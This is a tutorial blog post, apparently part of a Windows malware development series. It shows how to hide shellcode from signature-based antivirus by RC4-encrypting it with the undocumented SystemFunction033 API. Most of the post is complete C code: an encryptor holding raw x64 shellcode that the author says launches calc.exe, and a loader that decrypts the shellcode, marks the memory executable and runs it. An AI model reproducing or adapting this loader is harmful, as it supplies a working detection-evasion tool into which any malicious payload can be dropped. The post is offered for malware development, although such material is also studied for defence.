Windows Malware Development Part 5: Payload Encryption - RC4

5 minute read

Objective

Hey guys, welcome to the fifth part of Windows Malware Development, in which we will look at how to encrypt our malicious shellcode using the RC4 cryptographic algorithm.

Payload Encryption

Malware authors use encryption algorithms to hide the malicious content placed inside a binary. Encryption can help beat signature-based detection, but has a higher chance of failing against other detection mechanisms such as run-time analysis.

RC4 Encryption

RC4 is a stream cipher that shines when it comes to speed and efficiency. Another handy trait about it is that the function responsible for encryption can also be used for decryption. We won’t be going in too much detail when it comes to the internals, but this is all the necessary information needed to accomplish our task.

There are multiple methods that can be used to perform RC4 encryption, ranging from simple implementations to advanced. However, in this post, we will be looking at something interesting; using an undocumented NTAPI.

SystemFunction032/033

SystemFunction032/033 is an undocumented Windows NTAPI, which does not have official resources. Moreover, structures used by this NTAPI are also undocumented, making the implementation unconventional.

There are two reasons for using this NTAPI rather than other better known APIs; firstly, the implementation of RC4 encryption using this NTAPI is much smaller than the other APIs. Secondly, this can be used as an example to learn about using undocumented API for MalDev purposes.

This NTAPI is exported by Advapi32.dll, and the implementation can be found in Cryptsp.dll:

cryptsp.dll

It does not matter whether you use SystemFunction032 or SystemFunction033, since they both point to the same offset. We know this by looking at the export table of Cryptsp.dll.

cryptsp.dll-exports

This function takes two structures as parameters; a structure for the data to be encrypted/decrypted, and a structure which defines the key. This information can be found on the WineAPI page.

NTSTATUS SystemFunction032
 (
  struct ustring*       data,
  const struct ustring* key
 )

In order to understand how to implement this NTAPI, we will first have to figure out how to use the USTRING structure.

USTRING Structure

Since this NTAPI is undocumented, there is no official information that can be found about the USTRING structure. However, the structure definition can be found in the Wine GitHub repo, in crypt.h.

struct ustring {
    DWORD Length;
    DWORD MaximumLength;
    unsigned char *Buffer;
};

With this, we can start building our program.

Writing the Program - Encryption

The flow for our program would go as follows:

  • Define a function pointer for SystemFunction033.
  • Retrieve the address of SystemFunction033 from advapi32.dll.
  • Initialize the key and shellcode buffers and set up the ustring structures to point to them.
  • Call SystemFunction033 for shellcode encryption using the specified key.
  • Print the encrypted shellcode.

Defining a Function Pointer for SystemFunction033

We will go about defining a function pointer for SystemFunction033 by using a typedef statement, which will take two pointers to ustring structures (our key and buffer).

#include <windows.h>
#include <stdio.h>
 
typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring *memoryRegion,
	struct ustring *keyPointer);

Retrieving the Address of SystemFunction033

As we already know, SystemFunction033 is exported by Advapi32.dll, which means that in order to get its address, we must first load Advapi32.dll into the process using LoadLibrary, and then use the return value as a parameter for GetProcAddress to retrieve the address of SystemFunction033 which will be type-casted into the function pointer.

int main() {
 
	_SystemFunction033 SystemFunction033 =(_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");

Initializing the Buffers

Next, we will initialize the buffers for our shellcode to be encrypted and the key to be used, and point them to the appropriate structures.

char _key[] = "4p0cryph0n";
 
unsigned char shellcode[] = {
	 };
 
key.Buffer = (PUCHAR)(&_key);
key.Length = sizeof key;
 
_data.Buffer = (PUCHAR)shellcode;
_data.Length = sizeof shellcode;

Calling SystemFunction033

The final step in the encryption process is to call SystemFunction033 with the two parameters being our shellcode and the encryption key. Note that the encrypted shellcode from SystemFunction033 will be stored in the same buffer as our unencrypted shellcode.

	SystemFunction033(&_data, &key);

Printing the Encrypted Shellcode

We will print the result from SystemFunction033 in a suitable format for us to use later.

	printf("\nunsigned char shellcode[] = { ");
	for (size_t i = 0; i < _data.Length; i++) {
		if (!(i % 16)) printf("\n    ");
		printf("0x%02x, ", _data.Buffer[i]);
		if(i == _data.Length-1) printf("0x%02x };", _data.Buffer[i]);
	}

So all in all, this is what our encryption routine should look like:

#include <windows.h>
#include <stdio.h>
 
typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring *memoryRegion,
	struct ustring *keyPointer);
 
struct ustring {
	DWORD Length;
	DWORD MaximumLength;
	PUCHAR Buffer;
} _data, key;
 
int main() {
 
	_SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");
 
	char _key[] = "4p0cryph0n";
 
	unsigned char shellcode[] = { 
		0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
		0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,
		0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
		0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,
		0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
		0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,
		0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
		0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
		0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
		0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
		0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
		0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,
		0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
		0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,
		0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
		0x63,0x2e,0x65,0x78,0x65,0x00 };
 
	key.Buffer = (PUCHAR)(&_key);
	key.Length = sizeof key;
 
	_data.Buffer = (PUCHAR)shellcode;
	_data.Length = sizeof shellcode;
 
	SystemFunction033(&_data, &key);
 
	printf("\nunsigned char shellcode[] = { ");
	for (size_t i = 0; i < _data.Length; i++) {
		if (!(i % 16)) printf("\n    ");
		printf("0x%02x,", _data.Buffer[i]);
		if(i == _data.Length-1) printf("0x%02x };", _data.Buffer[i]);
	}
}

For the purposes of this blog, the shellcode used here is meant to execute calc.exe.

Writing the Program - Decryption

As we already know, RC4 is a bi-directional encryption cipher, which means we can use the same routine to decrypt and execute our shellcode. We will paste the encrypted shellcode in the decryption program, and use the same key. All in all, it should look like this:

#include <windows.h>
#include <stdio.h>

typedef NTSTATUS(WINAPI* _SystemFunction033)(
	struct ustring* memoryRegion,
	struct ustring* keyPointer);

struct ustring {
	DWORD Length;
	DWORD MaximumLength;
	PUCHAR Buffer;
} _data, key;

int main() {

	_SystemFunction033 SystemFunction033 = (_SystemFunction033)GetProcAddress(LoadLibrary(L"advapi32"), "SystemFunction033");

	char _key[] = "4p0cryph0n";

	unsigned char shellcode[] = {
	0x0a,0x78,0xce,0xd7,0x9e,0x1f,0x33,0x38,0x57,0x8b,0x41,0x1d,0x0a,0x33,0xe1,0x3d,
	0x18,0x97,0x46,0x67,0x04,0x20,0x07,0xc0,0x57,0x90,0x05,0xd9,0xbd,0xfa,0x79,0x34,
	0xc0,0xb2,0x1e,0xb1,0x67,0x3d,0x85,0x2a,0x5f,0x06,0xff,0xc3,0x51,0xd1,0x81,0x91,
	0xcf,0xac,0x6a,0xbb,0x62,0xd7,0xc9,0x32,0x28,0x6c,0x9b,0x62,0x43,0xa7,0x59,0x5e,
	0x58,0xbf,0xdc,0x99,0xb0,0x0a,0x02,0xc4,0xed,0x2b,0x63,0xd5,0x01,0x86,0x1b,0xcb,
	0x0e,0x2d,0x10,0x09,0x7a,0x6b,0xa1,0x79,0xbd,0x8f,0x7f,0xe8,0xc9,0x0b,0xfd,0x3d,
	0x9b,0x3a,0x85,0x53,0x57,0x73,0x3c,0x6f,0x87,0xa3,0xdb,0x17,0x2a,0xa1,0xdc,0x61,
	0xb8,0x99,0x8b,0xb9,0x94,0x77,0x2c,0xfa,0xa7,0xba,0x84,0xd4,0xe6,0x27,0xc0,0x33,
	0x0a,0xcc,0x95,0x94,0xfc,0x5e,0x0a,0x4e,0x32,0xf7,0x23,0x52,0x91,0xea,0xf6,0x3f,
	0xe1,0x7e,0x06,0xc5,0x57,0xd0,0x1f,0xf5,0x85,0x0b,0xf2,0xf8,0xf6,0xb0,0x3e,0x62,
	0x72,0xa7,0xf6,0xc7,0x0d,0xfb,0xa8,0xfc,0x69,0x91,0x05,0xbb,0xe0,0x57,0xe3,0x49,
	0x4d,0xe5,0xb8,0x0c,0xa4,0xdf,0x84,0x34,0x48,0x5d,0x24,0x7c,0x9b,0xdb,0xdf,0x45,
	0x2b,0xd5,0x2f,0x55,0x83,0x17,0x08,0xfc,0x8a,0xd4,0xd5,0x92,0x97,0xcb,0xb7,0x29,
	0x58,0x2d,0x8f,0x03,0x60,0xc9,0xf1,0x1c,0x34,0xc8,0xba,0xc4,0x46,0xd3,0x62,0xe6,
	0x47,0x55,0xa9,0x55,0x93,0x24,0xae,0xe6,0x18,0xad,0x57,0xc4,0x62,0xe3,0xda,0x04,
	0x2f,0x52,0x40,0x85,0x27,0x4e,0xa1,0x0d,0x5b,0x83,0x1c,0x3c,0xa5,0x93,0x94,0xc6,
	0x83,0x42,0x87,0x00,0x08,0xbf,0x00,0xd6,0x20,0x49,0xe6,0x2d,0x76,0xb5,0xd2,0xf9,
	0x4b,0x06,0xd0,0xe3,0xe3
	};

	key.Buffer = (PUCHAR)(&_key);
	key.Length = sizeof key;

	_data.Buffer = (PUCHAR)shellcode;
	_data.Length = sizeof shellcode;

	SystemFunction033(&_data, &key);

	DWORD oldProtect;
	if (!VirtualProtect(_data.Buffer, _data.Length, PAGE_EXECUTE_READWRITE, &oldProtect)) {
		printf("Failed to change memory protection.\n");
		return 1;
	}
	
	void (*func)() = (void (*)())_data.Buffer;
	func();
}

We are type-casting the buffer to a function pointer and calling it for execution.

That’s it for this post guys! Stay tuned for the next one!